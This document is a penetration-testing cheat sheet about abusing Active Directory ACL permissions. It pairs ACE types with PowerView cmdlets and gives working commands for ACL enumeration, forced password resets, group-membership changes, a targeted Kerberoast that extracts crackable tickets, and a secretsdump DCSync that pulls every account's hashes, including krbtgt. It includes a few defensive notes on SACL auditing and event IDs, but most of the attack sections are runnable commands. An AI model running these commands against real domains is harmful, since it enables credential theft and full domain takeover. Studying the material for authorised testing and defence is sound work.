
Access Control List (ACL)

An Access Control List (ACL) is the part of a securable object's security descriptor that states who may do what to that object. Every Active Directory object (users, groups, computers, OUs, GPOs, the domain head itself) carries one. An ACL is a list of Access Control Entries (ACEs); each ACE names a security principal (a user, group or computer) and allows or denies it specific rights on the object, either generic rights (GenericAll, GenericWrite, WriteDACL, WriteOwner) or object-specific ones such as an extended right or write access to a single attribute. Access to AD resources is enforced by evaluating these entries, so a single over-permissive ACE on the right object is a privilege escalation path.

Every AD object has two ACLs:

  1. Discretionary Access Control List (DACL) – the permissions list. It decides which principals can access the object and which actions they can perform; this is the list attackers abuse.
  2. System Access Control List (SACL) – the audit list. It decides which access attempts on the object are written to the Security event log (e.g. Event ID 4662) and does not grant or deny anything.

Interesting Abuses

| ACE | Abused with (PowerView) |
| --- | --- |
| ForceChangePassword | Set-DomainUserPassword |
| AddMembers | Add-DomainGroupMember |
| GenericAll | Set-DomainUserPassword, Add-DomainGroupMember |
| GenericWrite | Set-DomainObject |
| WriteOwner | Set-DomainObjectOwner |
| WriteDACL | Add-DomainObjectAcl |
| AllExtendedRights | Set-DomainUserPassword, Add-DomainGroupMember |
| AddSelf | Add-DomainGroupMember |

Enumerate ACLs

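The enumeration below is an added example, not code from the original page. It uses PowerView (assumed to be in the current directory), the page's sample principals (jethalal, bhide, REZYDEV) and shows the three views a tester actually needs: what is set on one target object, what the current user can reach, and a domain-wide sweep. The `$Dangerous` pattern and the list of "expected" admin principals are assumptions you should tune per environment.

```powershell
# Added example (not from the original page): enumerate ACEs with PowerView.
# Assumes PowerView.ps1 is in the current directory and the session already
# runs as a REZYDEV domain user. Names (jethalal, bhide) are the page's samples.
Import-Module .\PowerView.ps1

# Rights that let a principal modify the object or its security (assumed list;
# 'Self' covers AddSelf, 'ExtendedRight' covers ForceChangePassword/DCSync etc.)
$Dangerous = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self'

# 1. Inbound view: who holds dangerous rights on a specific target object?
#    -ResolveGUIDs turns extended-right/attribute GUIDs into readable names.
Get-DomainObjectAcl -Identity 'bhide' -ResolveGUIDs |
    Where-Object { $_.AceQualifier -eq 'AccessAllowed' -and $_.ActiveDirectoryRights -match $Dangerous } |
    ForEach-Object {
        [pscustomobject]@{
            Principal  = ConvertFrom-SID $_.SecurityIdentifier
            Rights     = $_.ActiveDirectoryRights
            # Only populated for object-specific ACEs (single attribute / extended right)
            ObjectType = $_.ObjectAceType
            Inherited  = $_.IsInherited
        }
    }

# 2. Outbound view: every object the current user, or a group they belong to,
#    holds interesting rights on. Group SIDs matter: most ACL paths go via groups.
$Sids = @((Get-DomainUser -Identity 'jethalal').objectsid) +
        @(Get-DomainGroup -MemberIdentity 'jethalal' | Select-Object -ExpandProperty objectsid)
Find-InterestingDomainAcl -ResolveGUIDs |
    Where-Object { $Sids -contains $_.SecurityIdentifier } |
    Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights, ObjectAceType

# 3. Domain-wide sweep: non-default principals with modify-type rights anywhere.
#    Find-InterestingDomainAcl already filters out read-only rights; this can be
#    slow on large domains, so run it once and save the output.
$Expected = 'Domain Admins|Enterprise Admins|Administrators|SYSTEM|Domain Controllers'
Find-InterestingDomainAcl -ResolveGUIDs |
    Where-Object { $_.IdentityReferenceName -notmatch $Expected } |
    Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights, ObjectAceType |
    Export-Csv -NoTypeInformation acl-sweep.csv
```

Read the inbound view first when you already know the target (e.g. a service account), and the outbound view when you know which account you hold; the sweep is for finding paths you did not expect, and its CSV is what you would feed into BloodHound-style path analysis.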


Authenticate to a User

# Build a PSCredential for the account whose ACL rights you are abusing (jethalal).
# The $Cred variable is reused by every -Credential parameter further down the page.
$JethalalPassword = ConvertTo-SecureString 'PASSWORD-OF-JETHALAL' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('REZYDEV\jethalal', $JethalalPassword)

Password Change Abuse

Warning (rights needed): ForceChangePassword (the User-Force-Change-Password extended right, shown as "Reset Password" in the GUI), GenericAll or AllExtendedRights on the target user. WriteDACL or WriteOwner do not reset a password directly, but let you grant yourself the right first. GenericWrite alone does not include this extended right.

# New password for the target user (constructed sample value)
$BhidePassword = ConvertTo-SecureString 'Bhide123@' -AsPlainText -Force

# Import PowerView for Set-DomainUserPassword
Import-Module .\PowerView.ps1

# $Cred is the PSCredential built under "Authenticate to a User" above.
# Reset bhide's password: jethalal must hold ForceChangePassword (or GenericAll /
# AllExtendedRights) on the bhide object. This is a reset, not a change, so the
# old password is not required, but the legitimate user is locked out and will notice.
Set-DomainUserPassword -Identity bhide -AccountPassword $BhidePassword -Credential $Cred -Verbose

Add/Remove a User to a Group

# Check whether the user is already a member (RSAT ActiveDirectory module;
# PowerView's Get-DomainGroupMember gives the same answer)
Get-ADGroup -Identity "Science Faculty" -Properties Members | Select-Object -ExpandProperty Members

# Add the user. $Cred is the PSCredential built under "Authenticate to a User".
# Needs AddMembers (WriteProperty on the group's member attribute), GenericWrite
# or GenericAll on the group; AddSelf only allows adding your own account.
Add-DomainGroupMember -Identity 'Science Faculty' -Members 'bhide' -Credential $Cred -Verbose

# Verify the addition
Get-DomainGroupMember -Identity "Science Faculty" | Select-Object MemberName

# Remove the user again (clean-up after the test)
Remove-DomainGroupMember -Identity "Science Faculty" -Members 'bhide' -Credential $Cred -Verbose

# Verify removal: no output means bhide is no longer a member
Get-DomainGroupMember -Identity "Science Faculty" | Where-Object { $_.MemberName -eq 'bhide' }

Targeted Kerberoasting Attack

Warning (rights needed): GenericAll or GenericWrite on the target user, WriteProperty on its servicePrincipalName attribute, or the Validated-SPN validated write. With any of these you can set a service principal name on a user that never had one, request a service ticket for it, and crack the ticket offline.

Tool: https://github.com/ShutdownRepo/targetedKerberoast

# -d is the domain name (e.g. rezydev.local), not the DC; point at a specific DC with --dc-ip.
# For every user the account can write to, the tool sets a temporary SPN, requests the
# TGS, prints the hash (hashcat/john format) and removes the SPN again.
targetedKerberoast.py -v -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --dc-ip "$DC_IP"

Kerberoast from:
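The same attack done by hand with PowerView, as an added example (not code from the original page or from the targetedKerberoast project), so that each step and the clean-up are visible. It assumes PowerView.ps1 is loaded, `$Cred` is the jethalal credential built earlier on the page, jethalal has GenericWrite or WriteProperty on servicePrincipalName for the page's sample user bhide, and the SPN value `fake/nothing.rezydev.local` is a made-up placeholder.

```powershell
# Added example (not from the original page): manual targeted Kerberoast with PowerView.
# Assumes PowerView.ps1 is loaded and $Cred holds jethalal's credential.
Import-Module .\PowerView.ps1

$Target  = 'bhide'
$TempSpn = 'fake/nothing.rezydev.local'   # assumed placeholder; any value unique in the forest works

# 1. Record the current SPN(s) so the object can be restored exactly afterwards.
$Before = Get-DomainUser -Identity $Target -Properties serviceprincipalname -Credential $Cred |
    Select-Object -ExpandProperty serviceprincipalname
if ($Before) {
    Write-Warning "$Target already has an SPN ($Before); roast it directly, no write needed."
}

# 2. Write a temporary SPN. This is the WriteProperty / GenericWrite abuse itself.
Set-DomainObject -Identity $Target -Set @{serviceprincipalname = $TempSpn} -Credential $Cred -Verbose

# 3. Request a service ticket for that SPN. The ticket is encrypted with bhide's
#    long-term key, so cracking it yields bhide's password.
Get-DomainUser -Identity $Target -Credential $Cred |
    Get-DomainSPNTicket -OutputFormat Hashcat -Credential $Cred |
    Select-Object -ExpandProperty Hash |
    Out-File -Encoding ascii roast.txt

# 4. Clean up: put the attribute back the way it was. Leaving a bogus SPN behind
#    is noisy and can break the account if a real SPN later collides with it.
if ($Before) {
    Set-DomainObject -Identity $Target -Set @{serviceprincipalname = $Before} -Credential $Cred -Verbose
} else {
    Set-DomainObject -Identity $Target -Clear serviceprincipalname -Credential $Cred -Verbose
}

# Offline: hashcat -m 13100 roast.txt wordlist.txt   (RC4 TGS-REP; use -m 19700 for AES256)
```

Steps 2 and 4 are both attribute writes on the user object, which is why a defender can catch this with a SACL on servicePrincipalName (Event ID 5136 directory service changes) rather than on the Kerberos traffic itself.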


DCSync

DCSync impersonates a domain controller. The attacker speaks the Directory Replication Service Remote protocol (MS-DRSR, the same RPC interface DCs use to replicate with one another) to ask a DC for the data of any account, including its password hashes and Kerberos keys. Nothing is executed on the DC and NTDS.dit is never touched, so with the right permissions one request returns the secrets of domain administrators and of krbtgt, which is enough to take over the whole domain.

The request is sent with a tool such as Mimikatz (lsadump::dcsync) or Impacket's secretsdump.py. If the calling account holds the Replicating Directory Changes (DS-Replication-Get-Changes) and Replicating Directory Changes All (DS-Replication-Get-Changes-All) extended rights on the domain naming context, the DC treats it as a replication partner and answers with the hashes. By default only Administrators, Domain Admins, Enterprise Admins and domain controllers hold both rights; anyone with WriteDACL or WriteOwner on the domain root can grant them to themselves (Add-DomainObjectAcl in the table above). The returned NTLM hashes can be cracked offline or used directly for pass-the-hash, and the krbtgt key for golden tickets. Defences: keep the replication rights restricted to the default holders and review the domain-root DACL regularly, alert on Event ID 4662 where the accessed property is the DS-Replication-Get-Changes or Get-Changes-All GUID and the subject is not a DC account, and flag DRSUAPI replication traffic coming from hosts that are not domain controllers.

secretsdump.py

# Dump NTLM hashes and Kerberos keys for every account over DRSUAPI (DCSync);
# jethalal must hold the replication rights described above. 192.168.1.7 is the DC.
python3 /path/to/secretsdump.py -outputfile hashes -just-dc REZYDEV/jethalal@192.168.1.7
## '-just-dc-ntlm' dumps NTLM hashes only
## '-just-dc-user bhide' dumps a single account (quieter; 'krbtgt' is the golden-ticket target)

More